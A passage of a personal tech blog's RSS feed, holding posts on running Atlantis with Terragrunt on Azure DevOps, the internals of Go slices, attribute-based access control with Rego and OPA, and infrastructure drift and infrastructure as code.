RUN terraform-bundle package -os=linux -arch=amd64 terraform-bundle.hcl
RUN mkdir /go/tmp \
  &amp;&amp; unzip /go/terraform_*-bundle*_linux_amd64.zip -d /go/tmp

FROM runatlantis/atlantis:v0.11.1
ENV TF_IN_AUTOMATION=&quot;true&quot;
ENV TF_CLI_ARGS_init=&quot;-plugin-dir=/home/atlantis/.atlantis/plugin-cache&quot;

# Install Azure CLI
ARG AZURE_CLI_VERSION=&quot;2.0.74&quot;
RUN apk add py-pip \
  &amp;&amp; apk add --virtual=build gcc libffi-dev musl-dev openssl-dev python-dev make
RUN pip --no-cache-dir install azure-cli==${AZURE_CLI_VERSION}

# Install Terragrunt
ARG TERRAGRUNT_VERSION=&quot;v0.23.2&quot;
RUN curl -L -o /usr/local/bin/terragrunt https://github.com/gruntwork-io/terragrunt/releases/download/${TERRAGRUNT_VERSION}/terragrunt_linux_amd64 \
  &amp;&amp; chmod +x /usr/local/bin/terragrunt
  
# Copy plugins
COPY .terraformrc /root/.terraformrc
COPY --chown=atlantis:atlantis --from=builder /go/tmp /home/atlantis/.atlantis/plugin-cache
RUN mv /home/atlantis/.atlantis/plugin-cache/terraform /usr/local/bin/terraform

# Configure git
COPY .gitconfig /home/atlantis/.gitconfig
COPY azure-devops-helper.sh /home/atlantis/azure-devops-helper.sh

# Copy server-side repository config
COPY repository-config.yaml /home/atlantis/repository-config.yaml

CMD [&quot;server&quot;, &quot;--repo-config=/home/atlantis/repository-config.yaml&quot;]

LABEL org.opencontainers.image.title=&quot;Atlantis Environment&quot;
LABEL org.opencontainers.image.description=&quot;An environment to support executing Terragrunt operations with Atlantis&quot;

LABEL binary.atlantis.version=&quot;v0.11.1&quot;
LABEL binary.terragrunt.version=${TERRAGRUNT_VERSION}
LABEL binary.azure-cli.version=${AZURE_CLI_VERSION}
</code></pre>
<p>Our <code>Dockerfile</code> not only contains Atlantis, but also:</p>
<ul>
<li>Terragrunt for DRY infrastructure code.</li>
<li>The Azure CLI to be able to provision and manage Azure resources.</li>
<li><a href="https://github.com/hashicorp/terraform/tree/master/tools/terraform-bundle">Terraform Bundle</a> to explicitly configure which plugins are pre-installed.</li>
</ul>
<pre><code class="language-hcl"># The version of Terraform to include with the bundle.
terraform {
  version = &quot;0.12.21&quot;
}

# The providers to pre-download and include in the Atlantis image.
providers {
  azurerm     = [&quot;~&gt; 2.0.0&quot;]
  azuread     = [&quot;~&gt; 0.7.0&quot;]
  random      = [&quot;~&gt; 2.2.0&quot;]
  local       = [&quot;~&gt; 1.4.0&quot;]
}
</code></pre>
<p>.. as well as small helper script to assist with authorization to Azure DevOps.</p>
<p>Atlantis <em>does</em> have a <code>--write-git-creds</code> flag, which will write out a <code>.git-credentials</code> file and configure the <code>git</code> client within the Docker image. However, we found that at the time of our implementation (and of writing this post), it always assumed an <code>ssh</code> connection.</p>
<p>In other words if, like us, you reference your Terraform modules via <code>https</code>:</p>
<pre><code class="language-hcl">module &quot;foo&quot; {
  source = &quot;git::https://org@dev.azure.com/org/project/_git/modules//foo?ref=0.1.0&quot;
}
</code></pre>
<p>Atlantis won't be able to pull your private module repositories within Azure DevOps.</p>
<p>To work around this, we implemented a <a href="https://git-scm.com/docs/gitcredentials">git credential helper</a> that sets the git username and password to the credentials that have already been passed into the environment.</p>
<p>The <code>.gitconfig</code> entry that wires up the helper:</p>
<pre><code class="language-ini">[credential &quot;https://dev.azure.com&quot;]
	helper = &quot;/bin/sh /home/atlantis/azure-devops-helper.sh&quot;
</code></pre>
<p>The script itself:</p>
<pre><code class="language-bash">#!/bin/sh 

# These values are already provided to the container from
# the Kubernetes manifest.
echo &quot;username=$ATLANTIS_AZUREDEVOPS_WEBHOOK_USER&quot;
echo &quot;password=$ATLANTIS_AZUREDEVOPS_TOKEN&quot;
</code></pre>
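<p>Purely for illustration, the same logic could be written in Go. A git credential helper simply prints <code>username=</code> and <code>password=</code> lines to stdout; the function name below is mine, and we shipped the shell script above, not this:</p>

```go
package main

import (
	"fmt"
	"os"
)

// credentialLines renders the two lines a git credential helper is
// expected to print to stdout in response to a "get" request.
func credentialLines(user, token string) string {
	return fmt.Sprintf("username=%s\npassword=%s\n", user, token)
}

func main() {
	// The same environment variables the Kubernetes manifest already
	// provides to the Atlantis container.
	fmt.Print(credentialLines(
		os.Getenv("ATLANTIS_AZUREDEVOPS_WEBHOOK_USER"),
		os.Getenv("ATLANTIS_AZUREDEVOPS_TOKEN"),
	))
}
```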
<p>While the above <code>Dockerfile</code> may be more than you need, at a minimum you'll need the Azure CLI if you intend on managing Azure resources.</p>
<h3 id="4applythemanifeststokubernetes">4. Apply the manifests to Kubernetes</h3>
<p>Many of our workloads already run on Kubernetes, so it seemed like the most reasonable choice for Atlantis as well. Better yet, the Atlantis team already provides the Kubernetes manifests, as well as examples on how to configure them. Both a Deployment and StatefulSet example are included <a href="https://www.runatlantis.io/docs/deployment.html#statefulset-manifest">here</a>.</p>
<p>We ended up choosing the StatefulSet approach, but your requirements may be different. The biggest factor to consider when choosing between the two approaches is that a Deployment won't persist the locks on your repositories if the pod is restarted, whereas a StatefulSet will. This is because Atlantis stores all of its data (e.g. locks, plugins) in its <code>data directory</code>. When using a Deployment resource, this will just be a folder within the container, which is not guaranteed to persist if the pod is restarted. On the other hand, a StatefulSet will use a Persistent Volume Claim, which allows the locks to persist, even through a restart.</p>
<p>Regardless of your choice, all that needs to be done is to find the <code>Azure DevOps Config</code> section in the provided example manifests and replace the placeholder values with the credentials that were created in the previous step.</p>
<h3 id="5configurethewebhooks">5. Configure the webhooks</h3>
<p>At this point, we had:</p>
<ul>
<li>A user with the proper access to clone repositories and comment on pull requests.</li>
<li>A Dockerfile with the tools needed to complete our workflows.</li>
<li>The Atlantis manifests applied to our Kubernetes cluster.</li>
</ul>
<p>The last major step in getting up and running with Atlantis was to add the webhooks that would respond to events within our repository.</p>
<p>Similar to the Kubernetes manifests, Atlantis provides great <a href="https://www.runatlantis.io/docs/configuring-webhooks.html#azure-devops">documentation</a> on how to configure these for Azure DevOps.</p>
<p>We just followed the steps, tested the connection, and began using Atlantis to review and deploy our infrastructure changes!</p>
<h2 id="returningtothesurface">Returning to the surface</h2>
<p>Our journey to Atlantis was long, but we intend to vacation here for quite a while.</p>
<p>Teams can now create custom infrastructure workflows that make sense for them, and we now have a central authority for all infrastructure changes. Better yet, it allowed us to retire our legacy workflows, and adopt an open source solution with a great community behind it.</p>
<p>Special thanks to <a href="https://twitter.com/mcdafydd">@mcdafydd</a> for adding the Azure DevOps integration to Atlantis.</p>
]]></content:encoded></item><item><title><![CDATA[Go Slices Demystified]]></title><description><![CDATA[<p>Slices are one of those types in Go that take a little bit of time and hands-on experience to really wrap your head around. There is a lot of material out there that explains slices, but I'm going to take a slightly different approach. We'll start with clarifying some</p>]]></description><link>https://reese.dev/go-slices-demystified/</link><guid isPermaLink="false">5d52c12518b2660ace8d0de5</guid><dc:creator><![CDATA[John Reese]]></dc:creator><pubDate>Mon, 14 Oct 2019 18:40:00 GMT</pubDate><content:encoded><![CDATA[<p>Slices are one of those types in Go that take a little bit of time and hands-on experience to really wrap your head around. There is a lot of material out there that explains slices, but I'm going to take a slightly different approach. We'll start with clarifying some potential misconceptions about the mechanics of slices, and prove out their implementation with executable Go code.</p>
<h2 id="slicesarevaluetypes">Slices are value types</h2>
<p>In practice, while it may appear that slices are <a href="https://dave.cheney.net/2017/04/29/there-is-no-pass-by-reference-in-go">pointer types</a>, in actuality they are value types.</p>
<pre><code class="language-go">package main

import (
	&quot;fmt&quot;
	&quot;unsafe&quot;
)

func main() {
	var s []int
	var p uintptr

	fmt.Printf(&quot;slice: %v | pointer: %v&quot;, unsafe.Sizeof(s), unsafe.Sizeof(p))
}
</code></pre>
<pre><code class="language-shell-session">$ go run main.go
slice: 24 | pointer: 8
</code></pre>
<p>A <code>uintptr</code>, at least on this 64-bit machine, is 8 bytes. The slice, <code>[]int</code>, is <em>three</em> times the size: 24 bytes.</p>
<p>This is due to the fact that a slice is a <em>value</em> type, specifically a <code>struct</code>, that contains <em>three</em> fields: Data, Len, and Cap.</p>
<p><em>See the <a href="https://golang.org/pkg/reflect/#SliceHeader">SliceHeader</a> documentation in the reflect package for more information. Alternatively, you can look at <a href="https://golang.org/src/runtime/slice.go">slice.go</a> from the Go runtime.</em></p>
<p>This means that when you pass a slice from one function to another, you are copying an entire <code>struct</code>, not just a pointer.</p>
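<p>To see what that copy means in practice, here's a small, self-contained example (the function names are mine): growing the slice inside a function is invisible to the caller, while writing an element through the shared backing array is visible.</p>

```go
package main

import "fmt"

// grow appends to its local copy of the slice header; the caller's
// header (Data, Len, Cap) is left untouched.
func grow(s []int) {
	s = append(s, 99)
}

// mutate writes through the copied header's Data pointer, so the
// change is visible to the caller.
func mutate(s []int) {
	s[0] = 42
}

func main() {
	nums := []int{1, 2, 3}

	grow(nums)
	fmt.Println(len(nums)) // still 3: the caller's copy of the header was never updated

	mutate(nums)
	fmt.Println(nums[0]) // 42: both headers point at the same backing array
}
```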
<p>As a bonus, since the <code>map</code> type often gets lumped into the same category as slices when talking about pointer types, a <code>map</code> in Go actually <em>is</em> a pointer type.</p>
<pre><code class="language-go">package main

import (
	&quot;fmt&quot;
	&quot;unsafe&quot;
)

func main() {
	var m map[int]int
	var p uintptr

	fmt.Printf(&quot;map: %v | pointer: %v&quot;, unsafe.Sizeof(m), unsafe.Sizeof(p))
}
</code></pre>
<pre><code class="language-shell-session">$ go run main.go
map: 8 | pointer: 8
</code></pre>
<h2 id="slicespointtoarrays">Slices point to arrays</h2>
<p>You'll notice that when it comes to growing in size, the behavior of a slice is what you would expect from a dynamic array. Hopefully you remember your lectures from data structures!</p>
<pre><code class="language-go">package main

import (
	&quot;fmt&quot;
)

func main() {
	nums := []int{1}

	// NOTE: &amp;nums[0] is used here to show the address of
	// the first element in the array.
	//
	// This is because the variable `nums` (no indexer) references
	// the struct of the slice.
	//
	// If the address of nums[0] changes, we know that the array that the
	// slice points to has changed.
	fmt.Printf(&quot;len %v | cap %v | addr %p\n&quot;, len(nums), cap(nums), &amp;nums[0])

	nums = append(nums, 2)
	fmt.Printf(&quot;len %v | cap %v | addr %p\n&quot;, len(nums), cap(nums), &amp;nums[0])

	nums = append(nums, 3)
	fmt.Printf(&quot;len %v | cap %v | addr %p\n&quot;, len(nums), cap(nums), &amp;nums[0])

	nums = append(nums, 4)
	fmt.Printf(&quot;len %v | cap %v | addr %p\n&quot;, len(nums), cap(nums), &amp;nums[0])

	nums = append(nums, 5)
	fmt.Printf(&quot;len %v | cap %v | addr %p\n&quot;, len(nums), cap(nums), &amp;nums[0])
}
</code></pre>
<pre><code class="language-shell-session">$ go run main.go
len 1 | cap 1 | addr 0xc00004a1f0
len 2 | cap 2 | addr 0xc0000044a0
len 3 | cap 4 | addr 0xc0000200c0
len 4 | cap 4 | addr 0xc0000200c0
len 5 | cap 8 | addr 0xc00009a000
</code></pre>
<p>From the execution above, we can see that the initial creation of the slice sets both the capacity and length to 1.</p>
<p>When we perform an <code>append()</code> operation to add another value to the slice, we see that the capacity and length are incremented to 2.</p>
<p>You'll notice, however, that the address changed after the append. This is because the underlying array reached capacity. In order to be able to store the newly appended value, the slice needs to reference a new, larger array.</p>
<p>To accomplish this, Go will:</p>
<ul>
<li>Create a new array that is double the capacity of the original array</li>
<li>Populate the newly created array with the original values</li>
<li>Update the pointer on the slice to point to the newly created array</li>
</ul>
<p>As shown above, we can see all of these changes because append returns the slice with the new capacity and length values (and potentially a new backing array if the original was at capacity).</p>
<p>In the scenario where the slice needs a new backing array, any references to the old array are still valid.</p>
<pre><code class="language-go">package main

import (
	&quot;fmt&quot;
)

func main() {
	nums := []int{1}

	// Create a copy of the slice that was declared above
	c := nums

	// Sanity check that all of the properties for both slices are identical
	fmt.Printf(&quot;len %v | cap %v | addr %p\n&quot;, len(nums), cap(nums), &amp;nums[0])
	fmt.Printf(&quot;len %v | cap %v | addr %p\n&quot;, len(c), cap(c), &amp;c[0])

	// Since nums has a capacity of 1 and we are performing an append 
	// operation, the backing array will need to be replaced with 
	// a larger array
	nums = append(nums, 2)

	// After completing the append operation, nums has a new backing array
	// Note however that c still references the old array
	fmt.Printf(&quot;len %v | cap %v | addr %p\n&quot;, len(nums), cap(nums), &amp;nums[0])
	fmt.Printf(&quot;len %v | cap %v | addr %p\n&quot;, len(c), cap(c), &amp;c[0])
}
</code></pre>
<pre><code class="language-shell-session">$ go run main.go
len 1 | cap 1 | addr 0xc0000120d0
len 1 | cap 1 | addr 0xc0000120d0
len 2 | cap 2 | addr 0xc000012120
len 1 | cap 1 | addr 0xc0000120d0
</code></pre>
<p>So slices just reference arrays under the hood, and a slice is literally a <em>slice</em> of an array. What happens, then, if we don't look at the value that is returned from <code>append</code>?</p>
<pre><code class="language-go">package main

import (
	&quot;fmt&quot;
)

func main() {
	nums := []int{1}
	fmt.Printf(&quot;len %v | cap %v | addr %p\n&quot;, len(nums), cap(nums), &amp;nums[0])

	nums = append(nums, 2)
	fmt.Printf(&quot;len %v | cap %v | addr %p\n&quot;, len(nums), cap(nums), &amp;nums[0])

	nums = append(nums, 3)
	fmt.Printf(&quot;len %v | cap %v | addr %p\n&quot;, len(nums), cap(nums), &amp;nums[0])

	_ = append(nums, 4)
	fmt.Printf(&quot;len %v | cap %v | addr %p\n&quot;, len(nums), cap(nums), &amp;nums[0])
}
</code></pre>
<pre><code class="language-shell-session">$ go run main.go
len 1 | cap 1 | addr 0xc00004c1e0
len 2 | cap 2 | addr 0xc00005a460
len 3 | cap 4 | addr 0xc000098000
len 3 | cap 4 | addr 0xc000098000
</code></pre>
<p>Everything stays the same! That may not be shocking, but the interesting part is that the underlying array <em>did</em> change. And we can prove it.</p>
<pre><code class="language-go">package main

import (
	&quot;fmt&quot;
	&quot;reflect&quot;
	&quot;unsafe&quot;
)

func main() {
	nums := []int{1}
	fmt.Printf(&quot;len %v | cap %v | addr %p\n&quot;, len(nums), cap(nums), &amp;nums[0])

	nums = append(nums, 2)
	fmt.Printf(&quot;len %v | cap %v | addr %p\n&quot;, len(nums), cap(nums), &amp;nums[0])

	nums = append(nums, 3)
	fmt.Printf(&quot;len %v | cap %v | addr %p\n&quot;, len(nums), cap(nums), &amp;nums[0])

	// Call the append() function, but DO NOT update the slice 
	// to reflect the changes
	_ = append(nums, 4)
	fmt.Printf(&quot;len %v | cap %v | addr %p\n&quot;, len(nums), cap(nums), &amp;nums[0])

	// At this point, we already know nums was unchanged.
	// However, it's possible to see the appended value.

	// 1. Get the slice header of nums (struct with .Data, .Len, and .Cap)
	sliceHeader := (*reflect.SliceHeader)(unsafe.Pointer(&amp;nums))

	// 2. Using the .Data field in the slice header
	// cast it into a pointer to an array of ints (its actual type).
	array := (*[4]int)(unsafe.Pointer(sliceHeader.Data))

	// REMEMBER: The .Data field in the slice header points at the underlying array!
	fmt.Printf(&quot;nums len: %v | nums cap: %v\n&quot;, len(nums), cap(nums))
	fmt.Printf(&quot;last element in the array is: %v&quot;, array[3])
}
</code></pre>
<pre><code class="language-shell-session">$ go run main.go
len 1 | cap 1 | addr 0xc0000361f0
len 2 | cap 2 | addr 0xc0000044c0
len 3 | cap 4 | addr 0xc000040080
len 3 | cap 4 | addr 0xc000040080
nums len: 3 | nums cap: 4
last element in the array is: 4
</code></pre>
<p>You can see from the output that while the slice has a length of 3, we referenced the 4th element in the array (at index 3) and got the last value we appended. <strong>The slice remained unchanged</strong>, but the underlying array was updated to contain the appended value.</p>
<p><em>It is worth mentioning that this is a contrived example to showcase some of the internals, and isn't something you'd really see in production code.</em></p>
<p>In reality, you would just increase the length of the slice so that you were able to interact with more elements in the array. In other words, this is exactly what the <code>append</code> operation does for you when you use its return value.</p>
<pre><code class="language-go">// nums has a length of 3, so this line 
// would panic with an out of bounds error
fmt.Println(nums[3]) // panic: out of bounds

// Recall, however, that the array itself is still 
// of length 4 and the last appended value is 4

// We can increase the length of nums which lets us 
// access more of the underlying array. 
// This returns a slice with a length and capacity of 4.
nums = nums[:4]

fmt.Println(nums[3]) // prints 4

// NOTE: [:4] means allow the slice to see the 
// 0th index of the underlying array 
// up until the 3rd index.
</code></pre>
<p>TL;DR.. I just want to regurgitate stuff</p>
<ol>
<li>Slices are value types. They are not pointers</li>
<li>The slice type is a <code>struct</code> which has three private fields: <code>array</code>, <code>len</code>, and <code>cap</code></li>
<li>Slices control what you can and cannot access in its backing array. It's possible to access more of the array by increasing the slice's <code>len</code> property via the <code>append</code> function</li>
<li>Slices hold a reference to an array, so it's possible that multiple slices reference the same array</li>
</ol>
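<p>And to drive the last point home, a short example (mine, not from the sections above) of two slices sharing one backing array:</p>

```go
package main

import "fmt"

func main() {
	nums := []int{1, 2, 3, 4}

	// head re-slices nums: a new slice header, but the same backing array.
	head := nums[:2]

	// A write through head is visible through nums.
	head[0] = 99
	fmt.Println(nums[0]) // 99

	// head has spare capacity (cap 4), so this append writes into
	// the shared array, overwriting nums[2].
	head = append(head, 7)
	fmt.Println(nums[2]) // 7
}
```

<p>Both writes land in the same array because <code>head</code> never exceeds its capacity; one more <code>append</code> beyond capacity would allocate a new array and break the sharing.</p>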
<p></p>]]></content:encoded></item><item><title><![CDATA[Policing Through Policy]]></title><description><![CDATA[<p>Driving is one of those freedoms that we sometimes take for granted. Life would be quite different without the luxuries that a vehicle affords us. Unfortunately, driving is not without its dangers. Distracted driving can lead to collisions, cars can break down unexpectedly, and accidents are inevitable. We're only human.</p>]]></description><link>https://reese.dev/policing-through-policy/</link><guid isPermaLink="false">5d13c00418b2660ace8d0ddd</guid><category><![CDATA[security]]></category><dc:creator><![CDATA[John Reese]]></dc:creator><pubDate>Fri, 16 Aug 2019 14:02:45 GMT</pubDate><content:encoded><![CDATA[<p>Driving is one of those freedoms that we sometimes take for granted. Life would be quite different without the luxuries that a vehicle affords us. Unfortunately, driving is not without its dangers. Distracted driving can lead to collisions, cars can break down unexpectedly, and accidents are inevitable. We're only human.</p><p>While it would be nice to have an expert driver for every person who needs to get to their destination, it's not a scalable solution. Each person has their own specific timeline and destination.</p><p>Our solution as a society, then, is to give each person the ability to handle their own transportation. You take a driver's test to prove that you have a fundamental understanding of the rules of the road and the ability to actually drive the vehicle. If you pass, you are granted the privilege of joining the open road with millions of other human beings. While it sounds like chaos, and honestly it sometimes is, how do we seemingly manage to pull it off day in and day out?</p><p>The answer is <em>policies</em>.</p><p>To keep drivers from getting distracted while on the road, we've enacted distracted driver policies.
These policies include rules that prohibit drivers from using a cellphone while on the road, and bar the use of earbuds when the car is in motion.</p><p>We have policies around safety that state that cars must abide by all traffic signs, which tell us when we should stop and how fast we can go.</p><p>The key to this approach to enforcement is that it is generic and focuses on what the policy ultimately sets out to do. It doesn't matter if you're driving a Ford, a Chevy, or a Dodge; you're beholden to the same policies as everyone else.</p><p>So what's the point of all of this? The same philosophy can be applied within an organization! When policies are enforced within an organization, employees are more empowered to complete their tasks on their own, but are still kept in check by the policies that have been put in place.</p><p>You may be thinking, how does a policy differ from permissions?</p><p>Permissions, for the most part, are relatively easy to wrap our heads around. You either have a permission, or you do not. If you do not have permission to perform an action, well, you can't perform that action. This approach is rigid and inflexible, as there are many other aspects that should be considered when deciding whether someone can or cannot do something.</p><p>If you add in roles, we can now reason about what sorts of permissions someone should have given their role in the company. Truthfully, for small systems, this could be completely acceptable. Where roles and permissions fall down is when you consider larger systems, especially with multi-tenancy.</p><p>Let's consider the driving scenario again in the context of the USA.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/08/image.png" class="kg-image"></figure><div align="center">'murica</div><p>The United States would be an organization, and the states would be tenants. In this context, it wouldn't be far-fetched to have an "allowed to drive" permission per state.
Immediately we've introduced 50 permissions, per user, into our system. Not only is that a lot of permissions, we'd be going about securing the roads in the wrong way.</p><p>As an organization, we don't necessarily care whether or not you can drive in a specific state. We have driving laws that are applicable everywhere, and really, as long as you abide by them, that's all we should care about. This approach gives us an immense amount of flexibility. It would be crazy to have to pass a driver's test for every state you wanted to drive in! So why do we do it in software systems?</p><p>The scenario described above, associating a role (or permission) with every specific use case, is commonly referred to as <em>role explosion</em>. So what's the alternative?</p><h2 id="attribute-based-access-control">Attribute-based Access Control</h2><p>The key difference between ABAC and a role-based permission model is that ABAC considers the <em>context</em> when an authorization request is made. Remember, roles and permissions are binary: you can perform the action, or you cannot. Our rules and regulations around driving are a pretty good example of attribute-based access control.</p><p>For example, let's say when you pass your driver's test you are added to the Driver role. Then when you're on the road you're constantly being validated by policy checks. Are you going the speed limit? Are you on the correct side of the road? As you drive, we have that context, and the policy engine (police officer) can determine if you are violating the policies that the United States has set for all of its tenants.</p><p>If not already obvious, it is worth pointing out that in this scenario we did still use a role. Attribute-based access control can actually use roles as part of its decision-making process!</p><p>Leveraging policies instead of fine-grained permissions gives us a lot of flexibility and lets us focus on what we actually care about.
Permission models, on the other hand, are often far too restrictive and ignore the context in which the action is being performed.</p><p>Now, we're all well-versed in checking specific permissions and roles. One little if() statement can give you a yes or no answer to whether or not the action can be performed. But what does validating a policy actually look like?</p><h2 id="policy-validation-with-rego-and-opa">Policy Validation with Rego and OPA</h2><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/08/image-1.png" class="kg-image"></figure><p>I won't dive too deep into Rego as that could be a post in itself, but it is worth introducing Rego as a solution to policy validation for familiarity.</p><p><a href="https://www.openpolicyagent.org/docs/v0.10.7/how-do-i-write-policies/">Rego</a> is the policy language that drives <a href="https://www.openpolicyagent.org/">Open Policy Agent</a> policies. Keeping with the driving theme, an example distracted driving policy would be:</p><pre><code>In order to reduce the risks associated with distracted driving, certain conduct is prohibited while driving a company-owned motor vehicle or while driving a personal vehicle while on company business, including:

• Using cell phones (including hands-free) 
• Operating laptops, tablets, portable media devices, and GPS devices 
• Reading maps or any type of document, printed or electronic
</code></pre>
<p><sup><em>Taken from <a href="https://emcins.com">https://emcins.com</a></em></sup></p>
<p>This policy, represented in Rego, might look something like the following:</p><pre><code class="language-javascript">package distracted

disallowed_conduct = [
    &quot;USING_PHONE&quot;,
    &quot;OPERATING_MEDIA_DEVICE&quot;,
    &quot;READING_DOCUMENT&quot;
]

deny[msg] {
  input.vehicle.status = &quot;IN_MOTION&quot;
  input.driver.conduct = disallowed_conduct[_]
  
  msg = sprintf(&quot;invalid conduct: %v&quot;, [input.driver.conduct])
}
</code></pre>
<p>In this Rego policy, all of the conditions must be met in order for the policy agent to return a <code>deny</code> result for the authorization request.</p><p>If the vehicle has a status of IN_MOTION and the operator's conduct is in the disallowed list, we set the msg stating that they are in violation of the policy.</p><p>We'd also probably have another policy somewhere, outside of the distracted driving policy, that checks to make sure the operator has the <code>Driver</code> role:</p><pre><code class="language-javascript">package global

deny[msg] {
  not input.operator.role = &quot;Driver&quot;
  msg = &quot;Operator must be in the Driver role&quot;
}
</code></pre>
<p>Rego input is the JSON we all know and love, so an authorization request in this context could be:</p><pre><code class="language-json">{
  &quot;operator&quot;: {
    &quot;role&quot;: &quot;Driver&quot;,
    &quot;conduct&quot;: &quot;USING_PHONE&quot;
  },
  &quot;vehicle&quot;: {
    &quot;status&quot;: &quot;IN_MOTION&quot;
  }
}
</code></pre>
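<p>To make the evaluation concrete, here is a minimal sketch, written in Go rather than Rego, of the check the policy engine performs against this input. It is purely illustrative and not how OPA is actually implemented:</p><pre><code class="language-go">package main

import "fmt"

// deny mirrors the distracted driving rule: it returns a violation
// message when the vehicle is in motion and the driver's conduct
// appears in the disallowed list.
func deny(vehicleStatus, conduct string) (string, bool) {
	disallowed := []string{"USING_PHONE", "OPERATING_MEDIA_DEVICE", "READING_DOCUMENT"}
	if vehicleStatus != "IN_MOTION" {
		return "", false
	}
	for _, c := range disallowed {
		if conduct == c {
			return fmt.Sprintf("invalid conduct: %v", conduct), true
		}
	}
	return "", false
}

func main() {
	// Same values as the JSON input above.
	if msg, denied := deny("IN_MOTION", "USING_PHONE"); denied {
		fmt.Println(msg)
	}
}
</code></pre><p>For this input the sketch, like the Rego policy, produces a deny with the message <code>invalid conduct: USING_PHONE</code>.</p>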
<p>The power of this approach is that because it is so flexible, you can validate policy against almost any data set as long as it has some structure to it. </p><ul><li>You can validate that a <code>Dockerfile</code> only uses <code>FROM</code> on blessed images.</li><li>You can validate that a <code>.tf</code> file from Terraform only uses specific providers.</li><li>You can validate that a Kubernetes manifest contains specific label(s).</li></ul><p>.. just to name a few of the possibilities.</p><p>When you really think about it, these are the things we really care about. We don't necessarily care about a permission; we grant permission because we trust someone to perform an action, and because we trust they will enforce the policy.</p><p>Here we can just define the policy outright and let anyone* make changes, because we know the policy will always be enforced.</p><p>Like everything else in software and in life, it's not a silver bullet. You're still going to use roles and permissions to some degree, and you can't have policies around <em>everything. </em>It simply opens doors to additional approaches to automation via automatic approvals, and explicitly defines what our policies are in code.</p><p>If you're interested in seeing some more examples of what types of files you can validate, and what those policies might look like, you can check out the examples folder for conftest, which can be found here: <a href="https://github.com/instrumenta/conftest/tree/master/examples">https://github.com/instrumenta/conftest/tree/master/examples</a></p><p>I do help maintain the project, so if you do decide to explore it, I'd love to hear your feedback to help make it better.</p><p></p>]]></content:encoded></item><item><title><![CDATA[Drifting Into Failure]]></title><description><![CDATA[<p>Drifting into failure. 
It's one of my favorite ways to explain how the problems we face in our day-to-day became problems in the first place.</p><p>You may have heard of <em>drifting into failure</em> before. Sidney Dekker published an entire book around the idea, aptly named <a href="https://cloudcity.plex.com/external-link.jspa?url=https%3A%2F%2Fwww.goodreads.com%2Fbook%2Fshow%2F10258783-drift-into-failure" rel="nofollow">Drift into Failure</a></p>]]></description><link>https://reese.dev/drifting-into-failure/</link><guid isPermaLink="false">5cf7cfe518b2660ace8d0dd0</guid><dc:creator><![CDATA[John Reese]]></dc:creator><pubDate>Mon, 10 Jun 2019 22:17:45 GMT</pubDate><content:encoded><![CDATA[<p>Drifting into failure. It's one of my favorite ways to explain how the problems we face in our day-to-day became problems in the first place.</p><p>You may have heard of <em>drifting into failure</em> before. Sidney Dekker published an entire book around the idea, aptly named <a href="https://cloudcity.plex.com/external-link.jspa?url=https%3A%2F%2Fwww.goodreads.com%2Fbook%2Fshow%2F10258783-drift-into-failure" rel="nofollow">Drift into Failure</a>. He presents it as the idea that every small problem we ignore (or cover up) gets us closer to failure. What is a problem? What is a failure? That's one of the great things about keeping the idea abstract. It really lets you fill in the blanks and make up your own definitions.</p><p>Miss an oil change? Not the end of the world. Keep on putting it off week after week, month after month? Eventually it's going to catch up to you.</p><p>Deadlines pushing you to implement a less-than-ideal solution? Again, probably not the end of the world, but if you keep implementing those less-than-ideal solutions, you're going to eventually end up with a mess.</p><p>You get the picture. The idea here is that failures aren't often born from a single event, but from the culmination of a lot of little events that didn't necessarily mean much on their own. 
We take little shortcuts here and there, but in the end, they will catch up to us in a potentially catastrophic way.</p><p>In the context of this post, I want to continue using this idea of drifting into failure, but speak specifically to how it applies to <strong>infrastructure</strong>.</p><p>To begin, you should be aware that there exists an approach to defining infrastructure using <strong>code</strong>. This is called IaC, or Infrastructure as Code. It's a <em>contract</em> that says: make my infrastructure look exactly like this. </p><p>One alternative to Infrastructure as Code is having someone on an operations team make ad hoc changes to the infrastructure. They would be notified that the infrastructure needs to change, so they would log in and run some commands.</p><p></p><blockquote><em>NOTE: Unfamiliar with the idea of contracts? You can read all about what they are and their benefits in <a href="https://reese.dev/locked-into-a-contract-lucky-you">Locked into a Contract? Lucky You!</a></em></blockquote><p></p><p>These are two very different styles of managing the infrastructure. One is an <em>imperative</em> approach, and the other is a <em>declarative</em> approach. These are two very important concepts, so it's worthwhile explaining them.</p><h2 id="imperative-and-declarative-approaches">Imperative and declarative approaches</h2><p>For me, one of the easiest ways to reason about both of these approaches is that <strong>declarative</strong> focuses on the <em>what </em>and <strong>imperative</strong> focuses on the <em>how. </em></p><p>If I wanted you to come to my office, I could say in a declarative way, "Come to my office". I don't care how you get here, but my desired state is that you are in my office. Alternatively, I could say in an imperative way, "Leave your office. Go to the elevator. Take the elevator to the 14th floor. 
Walk into my office".</p><p>The end result is the same in both scenarios, but the declarative approach gives you the freedom to get it done however you choose.</p><p>It's also important to note that <strong>declarative approaches often result in a series of imperative statements</strong>. To make that a little more clear, let's continue with the above example. I told you to come to my office, in a declarative manner. But that doesn't mean you just magically teleport in front of me. I made clear what I wanted the end result to be, but I left it up to you to figure out the individual, imperative steps to get there.</p><p>Dockerfiles are a great representation of this, in my opinion. A Dockerfile is a series of imperative commands, but they get bundled up into some desired state. The act of using an image from a Dockerfile is declarative (I want exactly this), but the steps required to get there were imperative.</p><p>Another important aspect of declarative approaches is <strong>state</strong>. In a declarative environment, we need to know what the current state of the infrastructure is. We also need the ability to figure out what needs to be done to get the infrastructure into that desired state. For example, if I tell some process to make my infrastructure look like X, and that process gets interrupted, it should be able to figure out what's remaining to get the infrastructure to look like X when it resumes.</p><p>Imperative does not allow for this, as it has no notion of state. While imperative approaches are simpler, the lack of state means that if the process is interrupted we have to start over again, because we don't know where we left off.</p><p>This is the power of being declarative and using contracts. 
They allow us to say exactly what we want the environment to look like with the contract, and leave all of the finer details up to the tooling that is fulfilling the contract.</p><h2 id="declarative-infrastructure">Declarative infrastructure</h2><p>You may have figured out by now that Infrastructure as Code is very much a declarative way of defining what your infrastructure should look like. There are a lot of benefits to leveraging Infrastructure as Code. To give you an idea, here are a few that really stand out for me:</p><h3 id="always-know-what-your-environment-looks-like">Always know what your environment looks like</h3><p>How many times have you wondered what version of .NET is on the build servers? What was your solution to finding out that information? Most likely it was to call up someone from the Ops team and have them tell you. Using Infrastructure as Code, the configuration of each environment is stored in source control, just like code. If you want to know some properties of an environment, you just need to go to the infrastructure repository and look for yourself.</p><h3 id="push-button-environments">Push button environments</h3><p>You'll most likely be hearing this phrase a lot in the days to come. The idea is that we should be able to define 